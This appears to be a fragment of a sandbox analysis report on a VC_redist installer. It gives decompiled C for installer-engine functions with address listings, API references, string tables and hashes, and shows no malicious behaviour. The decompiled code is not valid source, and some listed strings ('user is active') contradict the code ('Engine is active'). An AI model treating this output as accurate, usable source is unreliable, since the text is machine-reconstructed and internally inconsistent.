				_t67 = E0001D459( *(_t66 + 0xc) + 0xb8);
				if(_t67 >= 0) {
					_t63 = _a12;
					if(_t63 == 0 ||  *_t63 == 0) {
						_t67 = 0x80070057;
						goto L15;
					} else {
						_t67 = E0001C780(_t57,  *(_a4 + 0xc) + 0x3d8, _t63,  &_v8);
						if(_t67 >= 0) {
							LeaveCriticalSection( *(_a4 + 0xc));
							_t11 = _t53 + 4; // 0x4
							_t67 = E000121A5(_t11, _t63, 0);
							if(_t67 >= 0) {
								if(_a16 == 0) {
									L12:
									 *((intOrPtr*)(_t53 + 0x10)) = _a20;
									 *_t53 = _a8;
									if(PostThreadMessageW( *(_a4 + 0x10), 0x9004, 0, _t53) == 0) {
										_t43 = GetLastError();
										_t71 =  <=  ? _t43 : _t43 & 0x0000ffff | 0x80070000;
										_t67 =  >=  ? 0x80004005 :  <=  ? _t43 : _t43 & 0x0000ffff | 0x80070000;
										E000137D3(0x80004005, "EngineForApplication.cpp", 0x2f5, _t67);
										_push("Failed to post launch approved exe message.");
										goto L8;
									}
								} else {
									_t14 = _t53 + 0xc; // 0xc
									_t67 = E000121A5(_t14, _a16, 0);
									if(_t67 >= 0) {
										goto L12;
									} else {
										_push("Failed to copy the arguments.");
										goto L8;
									}
								}
							} else {
								_push("Failed to copy the id.");
								L8:
								_push(_t67);
								E0005012F();
							}
						} else {
							E0005012F(_t67, "UX requested unknown approved exe with id: %ls", _t63);
							goto L15;
						}
					}
				} else {
					_push("Engine is active, cannot change engine state.");
					_push(_t67);
					E0005012F();
					L15:
					LeaveCriticalSection( *(_a4 + 0xc));
				}
				if(_t67 < 0) {
					E0001BF5C(_t53);
				}
				return _t67;
			}










                                                                          0x0002ee01
                                                                          0x0002ee0b
                                                                          0x0002ee0e
                                                                          0x0002ee13
                                                                          0x0002ee16
                                                                          0x0002ee1b
                                                                          0x0002ee24
                                                                          0x0002ee30
                                                                          0x0002ee34
                                                                          0x0002ee48
                                                                          0x0002ee4d
                                                                          0x0002ef3d
                                                                          0x00000000
                                                                          0x0002ee5e
                                                                          0x0002ee74
                                                                          0x0002ee78
                                                                          0x0002ee94
                                                                          0x0002ee9e
                                                                          0x0002eea7
                                                                          0x0002eeab
                                                                          0x0002eec3
                                                                          0x0002eee1
                                                                          0x0002eee4
                                                                          0x0002eeea
                                                                          0x0002ef03
                                                                          0x0002ef05
                                                                          0x0002ef16
                                                                          0x0002ef20
                                                                          0x0002ef2e
                                                                          0x0002ef33
                                                                          0x00000000
                                                                          0x0002ef33
                                                                          0x0002eec5
                                                                          0x0002eecb
                                                                          0x0002eed4
                                                                          0x0002eed8
                                                                          0x00000000
                                                                          0x0002eeda
                                                                          0x0002eeda
                                                                          0x00000000
                                                                          0x0002eeda
                                                                          0x0002eed8
                                                                          0x0002eead
                                                                          0x0002eead
                                                                          0x0002eeb2
                                                                          0x0002eeb2
                                                                          0x0002eeb3
                                                                          0x0002eeb9
                                                                          0x0002ee7a
                                                                          0x0002ee81
                                                                          0x00000000
                                                                          0x0002ee86
                                                                          0x0002ee78
                                                                          0x0002ee36
                                                                          0x0002ee36
                                                                          0x0002ee3b
                                                                          0x0002ee3c
                                                                          0x0002ef42
                                                                          0x0002ef48
                                                                          0x0002ef48
                                                                          0x0002ef50
                                                                          0x0002ef53
                                                                          0x0002ef53
                                                                          0x0002ef60

                                                                          APIs
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • EnterCriticalSection.KERNEL32(?,00000014,00000001), ref: 0002EE1B
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0002EF48
                                                                          Strings
                                                                          • Failed to copy the id., xrefs: 0002EEAD
                                                                          • UX requested unknown approved exe with id: %ls, xrefs: 0002EE7B
                                                                          • userForApplication.cpp, xrefs: 0002EF29
                                                                          • user is active, cannot change user state., xrefs: 0002EE36
                                                                          • Failed to post launch approved exe message., xrefs: 0002EF33
                                                                          • Failed to copy the arguments., xrefs: 0002EEDA
                                                                          • @Met, xrefs: 0002EF05
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalHeapSection$AllocateEnterLeaveProcess
                                                                          • String ID: @Met$user is active, cannot change user state.$userForApplication.cpp$Failed to copy the arguments.$Failed to copy the id.$Failed to post launch approved exe message.$UX requested unknown approved exe with id: %ls
                                                                          • API String ID: 1367039788-170774163
                                                                          • Opcode ID: 01af31e6c9e9986c7084ab3d73ed12509fc5a629124e809e92d92a4268436fe2
                                                                          • Instruction ID: 32cdad34286fff95065ff3a7548f9e55a772e172a2068fde9be0f82a157a49cc
                                                                          • Opcode Fuzzy Hash: 01af31e6c9e9986c7084ab3d73ed12509fc5a629124e809e92d92a4268436fe2
                                                                          • Instruction Fuzzy Hash: 9B31E332A80375ABEB61AF24EC45EAB37E8EF04720B054025FD08EB291DB31DD4087A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00029496 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 101fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000,?,00000000,?,0002A5CE,?,00000000,?,?,0003B041), ref: 000294B1
                                                                          • GetLastError.KERNEL32(?,0002A5CE,?,00000000,?,?,0003B041,?,00000000,?,00000000,?,?,0003B041,?), ref: 000294BF
                                                                          • CloseHandle.KERNEL32(?,0003B041,00000001,00000003,000007D0,?,?,0003B041,?), ref: 0002959E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorFileHandleLast
                                                                          • String ID: %ls container from working path '%ls' to path '%ls'$@Met$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$cache.cpp
                                                                          • API String ID: 2528220319-2304174599
                                                                          • Opcode ID: 8768c270190c74847b9c7d1b5126f80a0c694856c27fe6823de94e3e1ce81b15
                                                                          • Instruction ID: e24ca1f299cbf016d3c4617723adcfdf147235ea6ca81fccb4e2b5f088eeec2b
                                                                          • Opcode Fuzzy Hash: 8768c270190c74847b9c7d1b5126f80a0c694856c27fe6823de94e3e1ce81b15
                                                                          • Instruction Fuzzy Hash: 37210572B80B347BF7222A299C46FAF365DDF52B55F000119FE09BE2C2D2A19D1086E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00023E47 Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 220sleepCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 77%
                                                                          			E00023E47(void* __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t51;
				intOrPtr* _t55;
				intOrPtr _t73;
				intOrPtr* _t82;
				intOrPtr* _t83;
				signed char* _t87;
				intOrPtr _t101;
				intOrPtr* _t103;
				char _t106;

				_t90 = __ecx;
				_push(__ecx);
				_t103 = _a4;
				_t106 = 0;
				_v8 = 0;
				_t87 = _t103 + 8;
				E00023955(_t87, __ecx, _t103, 0, _t87);
				if(( *_t87 & 0x00000006) == 0) {
					L11:
					_t101 = 0;
					L12:
					_t88 = _t103 + 0xc;
					_t46 =  *(_t103 + 0xc);
					if(_t46 == 0 ||  *_t46 == _t101) {
						_t47 =  *((intOrPtr*)(_t103 + 0x10));
						if(_t47 == 0 ||  *_t47 == _t101) {
							E0005006B();
							goto L38;
						} else {
							_t106 = E000239FD(_t101, _t103,  &_v8);
							if(_t106 >= 0) {
								_t106 = E0005041B(_t90, _t101, _t103, _v8,  *((intOrPtr*)(_t103 + 0x10)), 0,  *((intOrPtr*)(_t103 + 0x14)), 0, 0, _t88);
								if(_t106 >= 0) {
									goto L36;
								}
								E0005006B();
								_t106 = 0;
								L38:
								 *_t103 = 2;
								goto L39;
							}
							_push("Failed to get non-session specific TEMP folder.");
							goto L16;
						}
					} else {
						_a4 = _t101;
						_t106 = E0001410D(_t90,  &_v8);
						if(_t106 >= 0) {
							_t73 = _a4;
							do {
								if(_t73 != 0) {
									Sleep(0x7d0);
								}
								_t106 = E0005041B(0, _t101, _t103, _v8,  *_t88, 0, 0,  *(_t103 + 8) & 0x00000001, 0, _t88);
								_t73 = _a4;
								if(( *(_t103 + 8) & 0x00000001) != 0 && _t106 == 0x80070020) {
									_t73 = _t73 + 1;
									_a4 = _t73;
								}
							} while (_t73 != 0 && _t73 <= 3);
							if(_t106 >= 0) {
								L36:
								 *_t103 = 1;
								L39:
								if( *_t103 != 1) {
									L51:
									if(_v8 != 0) {
										E000554EF(_v8);
									}
									return _t106;
								}
								_t51 = E000132F1( *_t88);
								_a4 = _t51;
								if(_t51 == 0 ||  *_t51 == 0) {
									_t106 = E000121A5(_t103 + 0x10,  *_t88, 0);
									if(_t106 >= 0) {
										goto L48;
									}
									_push("Failed to copy full log path to prefix.");
								} else {
									_t106 = E000121A5(_t103 + 0x10,  *_t88, _t51 -  *_t88 >> 1);
									if(_t106 >= 0) {
										_t106 = E000121A5(_t103 + 0x14, _a4 + 2, 0);
										if(_t106 >= 0) {
											L48:
											_t55 =  *((intOrPtr*)(_t103 + 4));
											if(_t55 != 0 &&  *_t55 != 0) {
												E00018197(_a8, _t55,  *_t88, 0);
											}
											goto L51;
										}
										_push("Failed to copy log extension to extension.");
										L16:
										_push(_t106);
										E0005012F();
										goto L51;
									}
									_push("Failed to copy log path to prefix.");
								}
								goto L16;
							}
							E0005006B();
							 *_t103 = 2;
							if(( *(_t103 + 8) & 0x00000001) == 0) {
								_a4 = _t106;
								_t106 = 0x80070656;
								E0002E4F4(0, _a12, _a16, 0x80070656);
								_t79 = _a4;
								if(_a4 >= 0) {
									goto L39;
								}
								E0005012F(_t79, "Failed to open log: %ls",  *_t88);
								goto L51;
							}
							_t106 = 0;
							goto L39;
						}
						_push("Failed to get current directory.");
						goto L16;
					}
				}
				if(( *_t87 & 0x00000004) == 0) {
					if(( *_t87 & 0x00000002) == 0) {
						L6:
						_t90 = _t103 + 0xc;
						_t101 = 0;
						_t82 =  *((intOrPtr*)(_t103 + 0xc));
						if(_t82 == 0 ||  *_t82 == 0) {
							_t83 =  *((intOrPtr*)(_t103 + 0x10));
							if(_t83 == 0 ||  *_t83 == _t101) {
								E00012DE0(_t90, _t101, L"Setup", _t101, L"log", _t90, _t101);
								goto L11;
							} else {
								goto L12;
							}
						} else {
							goto L12;
						}
					}
					_push(0);
					_push(3);
					L5:
					E000505A2();
					goto L6;
				}
				_push(0);
				_push(4);
				goto L5;
			}


















                                                                          0x00023e47
                                                                          0x00023e4a
                                                                          0x00023e4e
                                                                          0x00023e53
                                                                          0x00023e55
                                                                          0x00023e58
                                                                          0x00023e5c
                                                                          0x00023e64
                                                                          0x00023eb0
                                                                          0x00023eb0
                                                                          0x00023eb2
                                                                          0x00023eb2
                                                                          0x00023eb5
                                                                          0x00023eb9
                                                                          0x00023f87
                                                                          0x00023f8c
                                                                          0x00023fd9
                                                                          0x00000000
                                                                          0x00023f93
                                                                          0x00023f9c
                                                                          0x00023fa0
                                                                          0x00023fc0
                                                                          0x00023fc4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00023fc6
                                                                          0x00023fcd
                                                                          0x00023fde
                                                                          0x00023fde
                                                                          0x00000000
                                                                          0x00023fde
                                                                          0x00023fa2
                                                                          0x00000000
                                                                          0x00023fa2
                                                                          0x00023ec8
                                                                          0x00023ecb
                                                                          0x00023ed4
                                                                          0x00023ed8
                                                                          0x00023eec
                                                                          0x00023eef
                                                                          0x00023ef1
                                                                          0x00023ef8
                                                                          0x00023ef8
                                                                          0x00023f19
                                                                          0x00023f1b
                                                                          0x00023f1e
                                                                          0x00023f28
                                                                          0x00023f29
                                                                          0x00023f29
                                                                          0x00023f2c
                                                                          0x00023f37
                                                                          0x00023fd1
                                                                          0x00023fd1
                                                                          0x00023fe4
                                                                          0x00023fe7
                                                                          0x0002407f
                                                                          0x00024083
                                                                          0x00024088
                                                                          0x00024088
                                                                          0x00024095
                                                                          0x00024095
                                                                          0x00023fef
                                                                          0x00023ff4
                                                                          0x00023ff9
                                                                          0x00024055
                                                                          0x00024059
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002405b
                                                                          0x00024002
                                                                          0x00024014
                                                                          0x00024018
                                                                          0x00024037
                                                                          0x0002403b
                                                                          0x00024065
                                                                          0x00024065
                                                                          0x0002406a
                                                                          0x0002407a
                                                                          0x0002407a
                                                                          0x00000000
                                                                          0x0002406a
                                                                          0x0002403d
                                                                          0x00023edf
                                                                          0x00023edf
                                                                          0x00023ee0
                                                                          0x00000000
                                                                          0x00023ee6
                                                                          0x0002401a
                                                                          0x0002401a
                                                                          0x00000000
                                                                          0x00023ff9
                                                                          0x00023f3d
                                                                          0x00023f46
                                                                          0x00023f4c
                                                                          0x00023f57
                                                                          0x00023f5a
                                                                          0x00023f66
                                                                          0x00023f6b
                                                                          0x00023f70
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00023f7a
                                                                          0x00000000
                                                                          0x00023f7f
                                                                          0x00023f50
                                                                          0x00000000
                                                                          0x00023f50
                                                                          0x00023eda
                                                                          0x00000000
                                                                          0x00023eda
                                                                          0x00023eb9
                                                                          0x00023e69
                                                                          0x00023e75
                                                                          0x00023e81
                                                                          0x00023e81
                                                                          0x00023e84
                                                                          0x00023e86
                                                                          0x00023e8a
                                                                          0x00023e91
                                                                          0x00023e96
                                                                          0x00023eab
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00023e8a
                                                                          0x00023e79
                                                                          0x00023e7a
                                                                          0x00023e7c
                                                                          0x00023e7c
                                                                          0x00000000
                                                                          0x00023e7c
                                                                          0x00023e6d
                                                                          0x00023e6e
                                                                          0x00000000

                                                                          APIs
                                                                            • Part of subcall function 00023955: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00023E61,feclient.dll,?,00000000,?,?,?,00014A0C), ref: 000239F1
                                                                          • Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,00014A0C,?,?,0005B478,?,00000001,00000000,00000000), ref: 00023EF8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseSleep
                                                                          • String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
                                                                          • API String ID: 2834455192-2673269691
                                                                          • Opcode ID: 03e92e14c4cbe8b3d011a184bf372992e0ca2b942217792fa5f377a3895336ca
                                                                          • Instruction ID: 9207d420c21c3dc04a63af2fdeefb84f51412f25dcb5fc7ba516f47151b176df
                                                                          • Opcode Fuzzy Hash: 03e92e14c4cbe8b3d011a184bf372992e0ca2b942217792fa5f377a3895336ca
                                                                          • Instruction Fuzzy Hash: 6A61E271A00635BBDF629F24EC46BABB6E8EF04300B054165FD01DB182E775EE9487A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00022A60 Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 298COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 89%
                                                                          			E00022A60(signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int* _a24) {
				char _v8;
				int _v12;
				char _v16;
				int _v20;
				intOrPtr* _v24;
				void* __edi;
				int _t107;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				signed int _t115;
				intOrPtr* _t119;
				signed int _t122;
				signed int _t126;
				short* _t127;
				signed int _t131;
				signed int _t132;
				signed int _t139;
				signed int _t143;
				intOrPtr* _t147;
				signed int* _t148;
				signed int _t149;
				intOrPtr _t152;
				signed int _t154;
				signed int* _t157;
				signed int _t159;
				signed int _t160;
				signed int _t163;
				signed int _t164;
				int _t165;
				signed int _t166;
				void* _t167;

				_t147 = _a4;
				_t163 = _a8;
				_t107 = 1;
				_v8 = 0;
				 *((intOrPtr*)(_t147 + 0x10)) = 1;
				_t164 = 0;
				_v16 = 0;
				_v12 = 0;
				if( *((intOrPtr*)(_t163 + 0xc)) == 0 && _a12 != 4) {
					_t107 = 0;
				}
				 *((intOrPtr*)(_t147 + 0x18)) = _t107;
				 *(_t147 + 0x1c) = 0;
				_t11 = _t163 + 0x40; // 0x6c0065
				_t148 =  *_t11;
				if(_t148 != 0) {
					__eflags =  *_t148;
					_t109 =  !=  ? _t148 : 0;
				} else {
					_t12 = _t163 + 0x10; // 0x6c0064
					_t109 =  *_t12;
				}
				_a4 = _t109;
				if( *_t147 != 3) {
					__eflags =  *(_t163 + 0x2c);
					if(__eflags != 0) {
						L43:
						_v20 = 1;
						L44:
						_t63 = _t163 + 0x54; // 0x6c44746c
						_t110 = E00054212(_t163, __eflags,  *_t63, 0);
						__eflags = _t110;
						if(_t110 == 0) {
							L47:
							 *(_t147 + 0x14) =  *(_t147 + 0x14) | 0x00000003;
							L50:
							 *(_t147 + 0x14) =  *(_t147 + 0x14) | 0x00000004;
							_t149 = 0;
							 *(_t147 + 0x38) = 1;
							_a20 = 0;
							__eflags =  *(_t163 + 0xb8);
							if( *(_t163 + 0xb8) <= 0) {
								L60:
								_t111 = _a4;
								__eflags = _t111;
								if(_t111 == 0) {
									goto L67;
								}
								__eflags =  *(_t163 + 0x40);
								if( *(_t163 + 0x40) != 0) {
									L63:
									_t115 = E00037B00(_t149, _t163, _t111);
									__eflags = _t115;
									if(_t115 != 0) {
										goto L67;
									}
									_t99 = _t163 + 0x10; // 0x6c0064
									_t164 = E00020D8A(_t147, 1, _a4,  *_t99);
									__eflags = _t164;
									if(_t164 >= 0) {
										goto L67;
									}
									_push("Failed to add registration action for self dependent.");
									goto L66;
								}
								__eflags = _v20;
								if(_v20 != 0) {
									goto L67;
								}
								goto L63;
							}
							_t157 = 0;
							__eflags = 0;
							_a24 = 0;
							do {
								_t74 = _t163 + 0xb4; // 0x280027
								_t119 =  *_t74 + _t157;
								_a16 = _t119;
								__eflags =  *_t119 - 5;
								if( *_t119 != 5) {
									goto L59;
								}
								_a8 = _a8 & 0x00000000;
								__eflags =  *(_t119 + 0xa0);
								if( *(_t119 + 0xa0) <= 0) {
									goto L59;
								}
								_t152 = 0;
								__eflags = 0;
								_a12 = 0;
								do {
									_v24 =  *((intOrPtr*)(_t119 + 0x9c)) + _t152;
									_t122 = E00037B00(_t152, _t163,  *( *((intOrPtr*)(_t119 + 0x9c)) + _t152));
									__eflags = _t122;
									if(_t122 != 0) {
										goto L57;
									}
									_t83 = _a16 + 0x18; // 0x6f0063
									_t164 = E00020D8A(_t147, 1,  *_v24,  *_t83);
									__eflags = _t164;
									if(_t164 < 0) {
										_push("Failed to add registration action for dependent related bundle.");
										goto L66;
									}
									L57:
									_t119 = _a16;
									_t159 = _a8 + 1;
									_t152 = _a12 + 0x10;
									_a8 = _t159;
									_a12 = _t152;
									_t90 = _t119 + 0xa0; // 0x6c0065
									__eflags = _t159 -  *_t90;
								} while (_t159 <  *_t90);
								_t149 = _a20;
								_t157 = _a24;
								L59:
								_t149 = _t149 + 1;
								_t157 = _t157 + 0xf8;
								_a20 = _t149;
								_a24 = _t157;
								_t95 = _t163 + 0xb8; // 0x2a0029
								__eflags = _t149 -  *_t95;
							} while (_t149 <  *_t95);
							goto L60;
						}
						__eflags =  *_t147 - 7;
						if( *_t147 != 7) {
							goto L50;
						}
						_t126 = E000296F2();
						__eflags = _t126;
						if(_t126 != 0) {
							__eflags =  *_t147 - 7;
							if( *_t147 == 7) {
								_t66 = _t147 + 0x14;
								 *_t66 =  *(_t147 + 0x14) | 0x00000002;
								__eflags =  *_t66;
							}
							goto L50;
						}
						goto L47;
					}
					_v20 = 0;
					__eflags =  *(_t163 + 0x34);
					if(__eflags == 0) {
						goto L44;
					}
					goto L43;
				} else {
					_t14 = _t163 + 0xbc; // 0x2c002b
					_t127 =  *_t14;
					_t165 = 2;
					if(_t127 == 0) {
						L10:
						_t17 = _t163 + 0xbc; // 0x2c002b
						_push( *_t17);
						_t18 = _t163 + 0x44; // 0x320033
						E0001550F(_t165, 0xa00000d1,  *_t18);
						_t167 = _t167 + 0x10;
						L11:
						_t164 = E00055323( &_v8, 5, 1);
						if(_t164 >= 0) {
							_t131 = _a4;
							__eflags = _t131;
							if(_t131 == 0) {
								L19:
								__eflags = _a16 - 2;
								if(_a16 == 2) {
									L67:
									if(_v8 != 0) {
										E00055450(_t163, _v8);
									}
									if(_v16 != 0) {
										E00058FC5(_v16, _v12);
									}
									return _t164;
								}
								_t132 = _a20;
								_t166 = 0;
								__eflags = _t132;
								if(_t132 == 0) {
									L25:
									_t154 = _t166;
									_a12 = _t154;
									__eflags =  *(_t163 + 0xb8) - _t166;
									if( *(_t163 + 0xb8) <= _t166) {
										L34:
										_t53 = _t163 + 0x44; // 0x320033
										_t54 = _t163 + 0x4c; // 0x44746553
										_t164 = E00058E07(_t154,  *_t54,  *_t53, _t166, _v8,  &_v16,  &_v12);
										__eflags = _t164 - 0x80070002;
										if(_t164 != 0x80070002) {
											__eflags = _t164;
											if(_t164 < 0) {
												_push("Failed to check for remaining dependents during planning.");
												L66:
												_push(_t164);
												E0005012F();
												goto L67;
											}
											__eflags = _v12;
											if(_v12 != 0) {
												 *(_t147 + 0x1c) = 1;
												 *_a24 =  *_a24 & 0x00000000;
												E0001550F(2, 0xa00000d2, _v12);
											}
											goto L67;
										}
										_t164 = 0;
										goto L67;
									}
									_t160 = _t166;
									_a16 = _t166;
									do {
										_t31 = _t163 + 0xb4; // 0x280027
										_t139 =  *_t31 + _t160;
										_a20 = _t139;
										__eflags =  *_t139 - 5;
										if( *_t139 != 5) {
											goto L33;
										}
										_a4 = _t166;
										__eflags =  *((intOrPtr*)(_t139 + 0xa0)) - _t166;
										if( *((intOrPtr*)(_t139 + 0xa0)) <= _t166) {
											goto L33;
										}
										_t161 = _t166;
										_a8 = _t166;
										while(1) {
											_t164 = E00037A49(_t154, _v8,  *((intOrPtr*)( *((intOrPtr*)(_t139 + 0x9c)) + _t161)));
											__eflags = _t164;
											if(_t164 < 0) {
												break;
											}
											_t139 = _a20;
											_t154 = _a4 + 1;
											_t161 = _a8 + 0x10;
											_a4 = _t154;
											_a8 = _a8 + 0x10;
											__eflags = _t154 -  *((intOrPtr*)(_t139 + 0xa0));
											if(_t154 <  *((intOrPtr*)(_t139 + 0xa0))) {
												continue;
											}
											_t154 = _a12;
											_t166 = 0;
											__eflags = 0;
											_t160 = _a16;
											goto L33;
										}
										_push("Failed to add dependent bundle provider key to ignore dependents.");
										goto L66;
										L33:
										_t154 = _t154 + 1;
										_t160 = _t160 + 0xf8;
										_a12 = _t154;
										_a16 = _t160;
										_t49 = _t163 + 0xb8; // 0x2a0029
										__eflags = _t154 -  *_t49;
									} while (_t154 <  *_t49);
									goto L34;
								}
								__eflags =  *_t132;
								if( *_t132 == 0) {
									goto L25;
								}
								_t164 = E00037A49(_t148, _v8, _t132);
								__eflags = _t164;
								if(_t164 >= 0) {
									_t166 = 0;
									__eflags = 0;
									goto L25;
								}
								_push("Failed to add dependents ignored from command-line.");
								goto L66;
							}
							_t143 = E00037B00(_t148, _t163, _t131);
							__eflags = _t143;
							if(_t143 == 0) {
								goto L19;
							}
							_t21 = _t163 + 0x10; // 0x6c0064
							_t164 = E00020D8A(_t147, 2, _a4,  *_t21);
							__eflags = _t164;
							if(_t164 >= 0) {
								_t164 = E00037A49(_t148, _v8, _a4);
								__eflags = _t164;
								if(_t164 >= 0) {
									goto L19;
								}
								_push("Failed to add self-dependent to ignore dependents.");
								goto L66;
							}
							_push("Failed to allocate registration action.");
							goto L66;
						}
						_push("Failed to create the string dictionary.");
						goto L66;
					}
					_t15 = _t163 + 0x10; // 0x6c0064
					if(CompareStringW(0, 1,  *_t15, 0xffffffff, _t127, 0xffffffff) != _t165) {
						goto L10;
					}
					 *(_t147 + 0x38) = _t165;
					goto L11;
				}
			}



































                                                                          0x00022a67
                                                                          0x00022a6e
                                                                          0x00022a73
                                                                          0x00022a74
                                                                          0x00022a77
                                                                          0x00022a7a
                                                                          0x00022a7c
                                                                          0x00022a7f
                                                                          0x00022a85
                                                                          0x00022a8d
                                                                          0x00022a8d
                                                                          0x00022a8f
                                                                          0x00022a92
                                                                          0x00022a95
                                                                          0x00022a95
                                                                          0x00022a9a
                                                                          0x00022aa1
                                                                          0x00022aa6
                                                                          0x00022a9c
                                                                          0x00022a9c
                                                                          0x00022a9c
                                                                          0x00022a9c
                                                                          0x00022aac
                                                                          0x00022aaf
                                                                          0x00022c7d
                                                                          0x00022c80
                                                                          0x00022c8a
                                                                          0x00022c8a
                                                                          0x00022c91
                                                                          0x00022c92
                                                                          0x00022c95
                                                                          0x00022c9a
                                                                          0x00022c9c
                                                                          0x00022cac
                                                                          0x00022cac
                                                                          0x00022cbb
                                                                          0x00022cbb
                                                                          0x00022cbf
                                                                          0x00022cc1
                                                                          0x00022cc8
                                                                          0x00022ccb
                                                                          0x00022cd1
                                                                          0x00022d6c
                                                                          0x00022d6c
                                                                          0x00022d6f
                                                                          0x00022d71
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022d73
                                                                          0x00022d77
                                                                          0x00022d7f
                                                                          0x00022d81
                                                                          0x00022d86
                                                                          0x00022d88
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022d8a
                                                                          0x00022d98
                                                                          0x00022d9a
                                                                          0x00022d9c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022d9e
                                                                          0x00000000
                                                                          0x00022d9e
                                                                          0x00022d79
                                                                          0x00022d7d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022d7d
                                                                          0x00022cd7
                                                                          0x00022cd7
                                                                          0x00022cd9
                                                                          0x00022cdc
                                                                          0x00022cdc
                                                                          0x00022ce2
                                                                          0x00022ce4
                                                                          0x00022ce7
                                                                          0x00022cea
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022cec
                                                                          0x00022cf0
                                                                          0x00022cf7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022cf9
                                                                          0x00022cf9
                                                                          0x00022cfb
                                                                          0x00022cfe
                                                                          0x00022d06
                                                                          0x00022d0c
                                                                          0x00022d11
                                                                          0x00022d13
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00022d18
                                                                          0x00022d28
                                                                          0x00022d2a
                                                                          0x00022d2c
                                                                          0x00022dd5
                                                                          0x00000000
                                                                          0x00022dd5
                                                                          0x00022d32
                                                                          0x00022d35
                                                                          0x00022d38
                                                                          0x00022d3c
                                                                          0x00022d3f
                                                                          0x00022d42
                                                                          0x00022d45
                                                                          0x00022d45
                                                                          0x00022d45
                                                                          0x00022d4d
                                                                          0x00022d50
                                                                          0x00022d53
                                                                          0x00022d53
                                                                          0x00022d54
                                                                          0x00022d5a
                                                                          0x00022d5d
                                                                          0x00022d60
                                                                          0x00022d60
                                                                          0x00022d60
                                                                          0x00000000
                                                                          0x00022cdc
                                                                          0x00022c9e
